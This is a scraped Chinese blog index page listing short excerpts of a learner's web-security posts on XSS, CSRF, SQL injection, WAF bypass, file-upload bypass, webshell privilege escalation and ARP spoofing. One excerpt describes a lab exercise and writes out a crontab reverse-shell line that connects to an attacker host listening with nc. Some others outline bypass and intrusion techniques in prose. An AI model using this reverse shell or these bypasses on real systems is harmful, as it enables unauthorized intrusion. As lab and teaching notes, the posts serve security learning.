自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(86)
  • 收藏
  • 关注

原创 XSS进阶小教程

一、在了解XSS之前,我们首先需要先了解一下HTML 与 JavaScript 自解码机制。1、HTML的自解码机制 浏览器在解析HTML标签属性值内的代码前,会先对下列两种编码进行解码,然后再对属性中的代码进行解析。(1)、进制解码:&#xH;(十六进制格式)、&#D;(十进制格式)。编码中最后的分号(;)可以不要。且16进制中用来表示10~15的a~f对大...

2019-02-25 11:27:44 4037 1

原创 不同于Token和Refer头校验的另一种CSRF防御办法

        事情的情况是这样的,前段时间在工作中发现XX系统存在CSRF漏洞,我在数据包内并未看到对应的Token参数,测试Refer头后发现XX系统并未对请求来源(refer)进行相关校验。我便认为此处存在CSRF漏洞并将该漏洞发送给了XX系统的相关负责人。但是过了几天后XX系统的负责人发来一份反馈邮件,邮件说他们系统做了CSRF校验但用的不是Token也不是Refer。而是如下方法:...

2018-12-24 11:42:16 2367 2

原创 敏感信息明文传输相关问题小结

最近在工作中,由于同事对敏感信息明文传输这个漏洞认识不深,导致工作出了一些问题。经过一番研究后,发现了其中的一些小知识点,在这里跟大家分享下,具体情况是这样的:1.我们在做安全测试的时候,经常可以通过Burpsuit抓包看到一些以明文方式呈现的敏感信息,比如在页面登陆处,我们输入账号密码,通过Burpsuit抓包,可以看到如下类似的数据包。 可以看到在数据包中,用户登陆用的账号和密...

2018-12-24 09:41:16 11177 1

原创 浅淡XSS跨站脚本攻击的防御方法

一、HttpOnly属性 为Cookie中的关键值设置httponly属性,众所周知,大部分XSS(跨站脚本攻击)的目的都是通过浏览器的同源策略,来获取用户Cookie,从而冒充用户登陆系统的。 如果为Cookie中用于用户认证的关键值设置httponly属性,浏览器将会禁止js通过同源策略访问cookie中设有httponly属性的信息,因此以劫...

2018-11-13 18:01:46 12680 3

原创 服务器set-cookie出现同名key的问题

首先简单介绍一下服务器set-cookie时关于path的规则cookie的path属性:它表示此cookie在哪个路径下起作用。如果服务器不设置cookie的path或设置了相同的path,则名字相同的Cookie视为相同的Cookie,后面的会覆盖前面的COOKIE,服务器设置COOKIE时是大小写敏感的。如果服务器为同名的Cookie设置了不同的path,那么这就是两个不同的CO...

2018-08-22 15:32:43 7443 1

原创 Ubuntu计划任务反弹shell

首先介绍一下实验环境1.被攻击者:Ubuntu 192.168.0.82.攻击者:kali  192.168.0.127 首先第一步在Ubuntu系统下添加crontab 计划任务* * * * * bash -i  >& /etc/tcp/192.168.0.127/8888 0>&1 第二步在kali系统下使用nc命令监听8888端口...

2018-08-19 13:46:53 4206

原创 为什么CSRF Token写在COOKIE里面

最近做渗透测试的时候经常看到用户的COOKIE信息里带有CSRF等字样的信息,问了一下同事,他们说这个是用来防御CSRF的字段。这一下可把我弄懵了,因为我对CSRF的理解是:攻击者盗用用户的COOKIE执行非用户本意的操作。我的想法是,用户的COOKIE就像是一张门禁卡一样,攻击者可以盗用用户的门禁卡,以被盗用户的身份来执行一些设计增删改的操作,既然用户已经盗用了用户的COOKIE刷卡进门...

2018-08-14 14:33:40 21951 42

原创 Cookie的属性和属性作用

Cookie属性:name字段:一个cookie的名称value字段:一个cookie的值domain字段:可以访问此cookie的域名path字段:可以访问此cookie的页面路径Size字段:此cookie大小http字段:cookie的httponly属性,若此属性为True,则只有在http请求头中会有此cookie信息,而不能通过document.cookie来访问此cookie。sec...

2018-07-12 14:55:46 7871

原创 关于为什么同一网站下返回的404页面不一样

今天在上班的时候偶然发现访问同一个网站,不同目录时返回的404页面不同。具体效果如下:情况1:情况2:因为是公司签了保密协议的东西,漏洞还未修复,所以我把IP盖住了,不过这俩确实是同意网站不同路径。在解释这个问题之前我们先来了解一下用户正常请求一个页面的流程:这里Web浏览器发送的请求就是我们在浏览器地址栏里输入的URL中间件就是指web服务器(本次测试的web服务器所使用的中间件是Tomcat)...

2018-07-12 11:48:29 889

转载 Bypass之D盾IIS防火墙SQL联合注入绕过(新版)

这种技术文章,不好意思标原创了,一下内容均来自公众号Bypass实验环境IIS+ASPX+MSSQL一、MSSQL特性在MSSQL中,参数和union之间的位置,常见的可填充的方式有如下几种:1.空白字符01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,202.注...

2018-07-04 17:00:13 12008 1

原创 Bypass之D盾IIS防火墙SQL注入防御

并非原创,标记原创只是为了涨积分,下面有原创大佬的原帖连接。一、针对 IIS+PHP+MYSQL配置的D盾防火墙绕过首先D盾大家在做渗透测试的时候多多少少应该都有遇到过就长这个样子,他会在你觉得发现漏洞的时候出现。。。。总之很烦人绕过姿势一、白名单PHP中的PHP_INFO问题,简单来说就是  http://x.x.x.x./3.php?id=1 等价于 http://x.x.x.x/3.php/...

2018-07-04 12:09:38 3015

原创 XSS,CSRF,SSRF三种漏洞的区别和共同点

以下言论均是个人在学习过程中总结而来,仅代表个人观点,由于博主也是web安全初学者,所以发表的观点很可能会存在一些错误或者有些不严谨的地方,如果您觉得哪里说的不对或者不合适,请随时在下方留言,希望能跟大家能够一起学习、进步,感谢。个人总结:相同点:XSS,CSRF,SSRF三种常见的Web服务端漏洞均是由于,服务器端对用户提供的可控数据过于信任或者过滤不严导致的。不同点:XSS是服务器对用户输入的...

2018-07-03 12:47:21 10523

原创 常见Web漏洞的修复方法

SQL注入1、使用转义函数对xxx参数进行转义2、检查数据类型,使用函数对数据类型进行强制转换3、使用预编译语句XSS1、使用转义函数转义xxx参数2、重要cookie使用HttpOnly,防止Cookie被盗(1) 对一些特殊的标签进行转义;(2) 直接过滤掉JavaScript事件标签和一些特殊的html标签;(3) 将重要的cookie标记为http only;(4) 只允许用户输入我们期望...

2018-07-03 10:38:56 2927

原创 DOS和DDOS攻击的原理和区别

DOS:中文名称是拒绝服务,一切能引起DOS行为的攻击都被称为DOS攻击。该攻击的效果是使得计算机或网络无法提供正常的服务。常见的DOS攻击有针对计算机网络带宽和连通性的攻击。 DOS是单机于单机之间的攻击。DOS攻击的原理:首先攻击者向被攻击的服务器发送大量的虚假IP请求,被攻击者在收到请求后返回确认信息,等待攻击者进行确认,(此处需要拥有HTTP协议工作方式和TCP三次握手的基本知识)该过程需...

2018-07-03 10:24:08 10255

原创 redis未授权访问反弹shell

一、redis的安装1.使用wget命令获取redis的安装包wget http://download.redis.io/releases/redis-4.0.8.tar.gz2.tar –zxvf redis-4.0.8.tar.gz解压改文件然后进入redis-4.0.8这个文件夹   cd redis-4.0.8然后执行make命令由于我们刚刚安装好redis数据库,还未创建用户,默认使用的...

2018-06-26 23:34:16 4569 3

原创 XSS跨站脚本攻击简介

首先介绍一下JavaScript中的同源策略:JavaScript中将协议,域名,端口,三者完全相同的网页视为同源。在HTML语音中,有部分标签在引用第三方资源时,不受同源限制<script><img><iframe><Link>除此之外还有好多上述这种带SRC属性的标签,在加载时,实际上是生成一条get请求,向指定服务器申请资源确定脚本的源,取决于...

2018-06-25 17:43:33 873

原创 大马提权详细过程

1.首先利用菜刀连接我们上传的小马文件2.在网站的www根目录下上传我们准备好的的大马文件3.这里我们上传的大马名称是chao.asp4.之后打开浏览器访问我们刚刚登陆的大马文件地址,并输入密码clever5.登陆进去之后如果发现CMD功能无法使用那么我们就自己通过菜刀上传一个CMD,我将其命名为smallchao.exe6.点击大马页面左侧的执行CMD这一栏7.在shell路径这一栏里输入服务器...

2018-06-25 17:27:26 16298 6

原创 任意命令执行漏洞简介

命令成因脚本语言有点事简洁,方便,但也伴随一些问题,比如运行速度慢,无法接触系统底层,如果我们开发的应用(特别是企业级的一些应用)需要除去web的特殊功能时,就需要调用一些外部程序。在应用需要去调用外部程序去处理的情况下,就会用到一些执行系统命令的函数。如php中的system,exec,shell_exec等,当用户可以控制命令执行的函数时,可以恶意注入系统命令到正常命令中,造成命令执行在PHP...

2018-06-24 08:31:48 3825

原创 任意代码执行漏洞简介

一、任意代码执行漏洞思维导图:代码执行漏洞的成因:应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。代码执行漏洞的常用函数PHP:eval,assert,preg_replace()+/e 模式Javascript:evalVbscript:Execute、EvalPython: execJava: Java中没有类似p...

2018-06-24 08:30:51 6541

原创 CSRF跨站请求伪造

CSRF介绍:CSRF中文名称:跨站请求伪造,是一种“挟持用户”在当前已登陆的Web应用程序上执行“非本意操作”的攻击方法。一、CSRF回放攻击流程套用老师所给的一张攻击原理图从这张流程图里我们总结一下CSRF攻击生效所需要的两个必要条件1.被攻击者成功登陆信任站点A,并在本地生成cookie2.用户使用同一浏览器在不退出的情况下,访问带有CSRF代码的网站B二、原理介绍首先说明一点,我们并没有挟...

2018-06-19 21:25:21 538

原创 自用XSS闯关攻略

老师搭建了一个让我们练手的XSS闯关平台,在这里跟大家分享一下,希望在学XSS的同学看过之后能有收获链接如下:http://114.115.183.86/zk/xsstest/xss_platform/code/xss01/index.php?name=chao只要我们能使用JavaScript语言让页面出现一个弹框就算闯关成功,如果页面没能正常跳转,在URL中将xss01改成对应关卡就行例如第8...

2018-06-19 17:37:25 2689

原创 sqli-labs闯关指南 1—10

如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一关1.经过语句and 1=2...

2018-06-18 23:15:10 56816 13

原创 arp欺骗实验

一、实验环境1.一台开启ftp服务的主机 (FTPserver)2.一台正常访问FTP服务的客户机( PC-A)3.一台能够使用进行ARP欺骗的主机(中间人,我用的kali)二、实验介绍PC-A访问本网络的一台FTPserver,中间人进行arp欺骗,获取PC-A和FTPserver之间的回话记录,截取用户名密码三、实验拓扑四、实验步骤1.以我本机(win10)作为PC-A   ip:192.16...

2018-06-18 17:57:34 6267 7

原创 OSI七层——网络层基础

网络层知识脑图:一、IP包结构二、IP地址分类IP地址是由:网络号和主机号两部分组成的IP地址的分层结构如下:简单来说,IP地址的前5位用于区分IP地址的类别A类地址的范围: 0-127      (0——2的7次方-1)B类地址的范围:128-191   (128——2的7次方+2的6次方-1)C类地址的范围:192-223   (192——2的7次方+2的6次方+2的5次方-1)D类地址的范围...

2018-06-17 19:26:48 646 2

原创 MAC地址泛洪攻击

实验环境1.一台Win7系统  (FTP服务器)   IP: 192.168.1.104  2.一台kali系统(中间人) IP: 192.168.1.1073.一台Win10系统    (用户)    IP:192.168.1.110三台机器连接同一交换机工具:macof(不断的变换自己的MAC地址,以达到欺骗交换机的目的)一、测试主机之间是否正常通信首先在WIN10系统上测试与其他两台机器的通...

2018-06-17 11:09:37 6586

原创 OSI七层——链路层介绍

链路层数据交换原理:1.主机之间的交换:{    主机mac地址表    转发原则    主机到主机之间的通信过程}2.网络交换机的工作原理{    mac地址学习方法    交换机转发原理}首先介绍一下MAC地址MAC地址就是主机的物理地址,MAC一共有48位,前24位是厂商位,后24位为厂商自定义mac地址在不同设备上的表现形式Windows:58-FB-84-1D-B3-11Linux: 5...

2018-06-17 10:26:56 573

原创 Ubuntu系统下个人博客的搭建

Ubuntu系统下个人博客的搭建1. 首先在自己的电脑上安装ubuntu系统,安装过程中记得选择英式键盘,不对自己的主机加密。2. 了解LAMP工作原理,也就是博客搭建模型。中间件:apache数据库:msyql脚本语言:php53. 为了更方便的使用ubuntu系统,我们先安装并启用SSH服务。(1)安装ssh:sudo apt-get install ssh(2)启动ssh服务:sudo se...

2018-06-17 09:00:20 2826

原创 Linux下tcpdump的简单使用

首先介绍一下什么是tcpdumptcpdump是Linux下的命令行抓包分析软件,而且在Linux下抓包很好用,一般企业的Linux运行等级为3,即多用户命令行模式,为了排错经常使用Tcpdump,tcpdump本身功能十分强大,保存的文件也可以直接使用Wireshark打开Tcpdump抓包指南之关键字的使用1.类型关键字:  host,net,port2.传输关键字:src,dst3.协议关键...

2018-06-16 18:19:54 944

原创 OSI七层——物理层介绍和安全

1.物理层   提供比特流传输2.链路层   提供介质访问,链路管理3.网络层   寻址和路由4.传输层   建立主机端到端的连接5.会话层   建立,维护,管理绘画6.表示层   处理数据格式,数据加密等7.应用层   提供应用程序间的通信一、物理层功能:在两个网络设备之间提供透明的比特流传输二、物理层有关的传输方式1.连接方式(点到点,点到多)2.通信方式(单工,半双工,全双工)3.为传输方式...

2018-06-15 23:38:58 7401

原创 针对单个网站的渗透思路(精)

本人Web安全初学者,从老师那里获得了一套很完整的针对单一网站的渗透思路今天起的早,就自己试着总结一份,记下来。分享给大家。首先,当我们拿到一个网站的域名或者IP的时候。最先要做的是信息收集。下面着重介绍一下信息收集模块一、信息收集——端口扫描与分析1.得到域名后查IP:推荐使用站长工具,选择whois查询和IP反查询,通过ping该域名查看IP。还可以在站长之家下面找到IP的 WHOIS查询,这...

2018-06-13 12:16:28 33147 15

原创 文件包含漏洞浅析

首先先介绍下什么是文件包含:程序开放人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需进行编写,这种调用过程被称呼为文件包含文件包含漏洞的成因:编程人员为了让代码的书写变得更加灵活,通常把被包含的文件设置为变量,用来动态调用,但如果用户对这个变量可控而且服务器端又没有对动态调用的文件进行足够的检测,或者校验被绕过就造成了文件包含漏洞。PHP中常见的文件包含函数:in...

2018-06-12 18:21:59 1479

原创 文件上传漏洞绕过手段

文件上传漏洞的成因:1.服务器的错误配置2.开源编码器漏洞3.本地上传上限制不严格被绕过4.服务器端过滤不严格被绕过常见上传检测流程2.文件上传漏洞的危害(1)网站被控制(2)服务器沦陷(3)同服务器的其他网站沦陷3.客户端验证检测可以看到客户端代码中使用了javascript语言进行了简单的文件后缀名判断这个时候我们只需要将本机浏览器的javascript模块禁用就可以使该段代码不被解析执行。在...

2018-06-12 18:20:40 14493 4

原创 sql注入半自动化扫描工具——报错注入(分析后续补上)

代码展示墙:关于注释和解析以后会补上现在只是先将代码保存在这里# -*- coding: utf-8 -*-import requestsimport sysimport hashlibfrom optparse import OptionParserimport reparser=OptionParser()parser.add_option("-D", "--Database", action...

2018-06-11 18:33:59 628

原创 sql注入半自动化扫描工具——盲注(分析后续补上)

代码展示墙: 先将代码保存在这里,解析以后会补上# -*- coding: utf-8 -*-import requestsimport sysimport hashlibfrom optparse import OptionParserparser=OptionParser()parser.add_option("-D", "--Database", action="store",type="s...

2018-06-11 18:31:55 786

原创 sqlmap自动化注入工具使用浅析

Sqlmap简介:Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。Sqlmap支持五种常用的注入方式:1.联合...

2018-06-11 18:27:58 1471

原创 SQL注入——布尔盲注,时间盲注,宽字节注入

布尔盲注1.布尔盲注利用前提页面没有显示位,没有输出SQL语句执行错误信息,只能通过页面返回正常不正常来判断是否存在注入缺点:速度太慢,消耗大量时间布尔盲注思维导图:布尔盲注常用语句:substr(string,num start,num length)string 为字符串string 为字符串length 为长度ascii( )函数作用:返回字符串str的字符ASCII码值。如果str是空字符...

2018-06-11 18:26:14 5553

原创 SQL注入——联合查询和报错注入

1.别人可能用一个括号将要查询的内容阔在一起了  可以使用)将其闭合2.还有人可能过滤掉了关键字可以使用如下方法anandd   selecselectt如果URL中把=号过滤掉了可以使用like进行模糊查询报错注入中sql里 0x3a表示一个冒号具体用法and (select 1 from (select count(*),concat((select count(schema_name) fr...

2018-06-11 18:24:58 6195 2

原创 留言板个人代码展示墙

每逢期末,各科专业课的课程设计相信会让许多和我一样的大学生磨破脑袋,本着与人为善,授人予鱼的思想,我决定。。。。。。好吧,你懂的,废话不多说,上菜!                       留言板功能模块                                                              一、注册模块 二、登陆模块三、留言板界面四、留言模块五、对个人留言的...

2018-06-06 10:23:13 8140

原创 Python初学者笔记之——dict和set

dict 是python内置的字典函数他使用 键-值(key-value)这种方式存储用法字典名={'键名': '键值','键名': '键值','键名': '键值'}      整型键值无需加引号需要注意的是:后面有一个空格具体用法字典键名是允许重复的,但是键值会取最后赋值的哪个键值例:python提供了两种方法来判断,字典内是否存在键名 X'键名' in 字典名该函数返回的是一个布尔值第二中是通...

2018-06-05 22:36:21 908

原创 Python初学者笔记之——条件判断与循环

使用if语句进行条件判断使用方法:如果if 条件语句的判断是True则执行:下面的代码记得书写代码时要空4格还可以使用elif elif else这种方式进行判断if语句执行有个特点,它是从上往下判断,如果在某个判断上是True,把该判断对应的语句执行后,就忽略掉剩下的elif和else例如:需要注意的是,当我们用input()函数从键盘读取一段字符串的时候该字符串的类型为str比如,我们从a=i...

2018-06-05 22:33:15 295

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除